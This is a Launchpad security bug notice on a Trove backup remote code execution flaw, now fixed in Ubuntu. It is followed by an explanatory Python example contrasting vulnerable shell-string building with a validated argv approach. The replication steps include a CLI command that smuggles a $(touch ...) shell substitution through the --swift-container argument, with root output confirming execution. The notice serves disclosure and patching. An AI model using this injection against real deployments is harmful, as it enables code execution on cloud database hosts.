[Bug 2028680] Re: Remote code execution: Trove backup
Marc Deslauriers
2028680 at bugs.launchpad.net
Tue Jul 25 16:51:55 UTC 2023
https://ubuntu.com/security/notices/USN-6245-1
** Changed in: openstack-trove (Ubuntu Jammy)
Status: Triaged => Fix Released
--
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to openstack-trove in Ubuntu.
https://bugs.launchpad.net/bugs/2028680
Title:
Remote code execution: Trove backup
Status in openstack-trove package in Ubuntu:
Fix Released
Status in openstack-trove source package in Jammy:
Fix Released
Status in openstack-trove source package in Lunar:
Fix Released
Status in openstack-trove source package in Mantic:
Fix Released
Bug description:
Note: Details taken from
https://storyboard.openstack.org/#!/story/2010004
An external security audit by Adam Bell, CyberCX New Zealand
(conducted for Catalyst Cloud) has identified a Remote Code Execution
security issue in Trove.
During a Trove instance backup command, it is possible to pass through
extra arguments via guestagent to docker, and utilize a subprocess
shell within backup python code to perform a Remote Code Execution
within the Trove backup container.
Replication steps:
1) Create mysql database instance.
2) Issue a backup command using the following:
$ openstack database backup create --instance rce-db1 --swift-container 'test --db-user="$(touch /rce_successful.txt)"' backup-name1
Validation of the RCE can be observed from within the Trove VM:
root at rce-db1:~# docker cp db_backup:/rce_successful.txt .
root at rce-db1:~# ls -l rce_successful.txt
-rw-r--r-- 1 root root 0 Apr 20 04:20 rce_successful.txt
The executed touch command above can be replaced with any shell
actions, including apt.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openstack-trove/+bug/2028680/+subscriptions
More information about the Ubuntu-openstack-bugs
mailing list
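The bug class described in the report above is argument injection into a subprocess shell: a user-controlled value (the `--swift-container` name) is spliced into a command string that a shell later parses, so quoting and `$(...)` substitution are honoured. The following Python example is added here for illustration and is not Trove's code or the audited code; the command names, flags and the container-name allow-list are assumptions. It shows the vulnerable string-building pattern beside a hardened form that passes the value as a single argv element and validates it first, using `shlex` to show how a POSIX shell would split each string without executing anything.

```python
import re
import shlex

# Constructed sample input: the hostile --swift-container value quoted in the
# bug report above, and a legitimate bare container name.
HOSTILE_CONTAINER = 'test --db-user="$(touch /rce_successful.txt)"'
SAFE_CONTAINER = "test"

# Hypothetical vulnerable pattern (not Trove's actual code): the value is
# interpolated into one string that is later handed to a shell (shell=True).
def build_shell_command_vulnerable(container: str, backup_name: str) -> str:
    return f"backup --swift-container {container} --name {backup_name}"

# Words a POSIX shell would split the string into. The shell would also run
# the $(...) substitution; shlex only tokenises, so nothing executes here.
def shell_words(cmd: str) -> list[str]:
    return shlex.split(cmd)

# Allow-list for container names (an assumption for this example, not the
# Swift or Trove rule): no whitespace, quotes or shell metacharacters.
_CONTAINER_RE = re.compile(r"^[A-Za-z0-9._-]{1,256}$")

def is_valid_container_name(name: str) -> bool:
    return _CONTAINER_RE.fullmatch(name) is not None

# First layer: build an argv list. Passed to subprocess.run(argv) with the
# default shell=False, each element reaches the program verbatim, so the
# hostile string stays one argument instead of becoming extra flags.
def build_argv(container: str, backup_name: str) -> list[str]:
    return ["backup", "--swift-container", container, "--name", backup_name]

# Second layer: reject values that fail the allow-list before any call.
def build_argv_hardened(container: str, backup_name: str) -> list[str]:
    if not is_valid_container_name(container):
        raise ValueError(f"invalid container name: {container!r}")
    return build_argv(container, backup_name)

if __name__ == "__main__":
    vuln = build_shell_command_vulnerable(HOSTILE_CONTAINER, "backup-name1")
    print("shell would see:", shell_words(vuln))
    print("argv keeps one element:", build_argv(HOSTILE_CONTAINER, "backup-name1")[2])
    print("hardened accepts:", build_argv_hardened(SAFE_CONTAINER, "backup-name1"))
```

With the hostile value, the shell-string form splits into six words, so `--db-user=...` arrives as an extra argument to the backup tool and a real shell would additionally run the substitution; the argv form keeps the whole value as a single element, and the validator rejects it before any process is started.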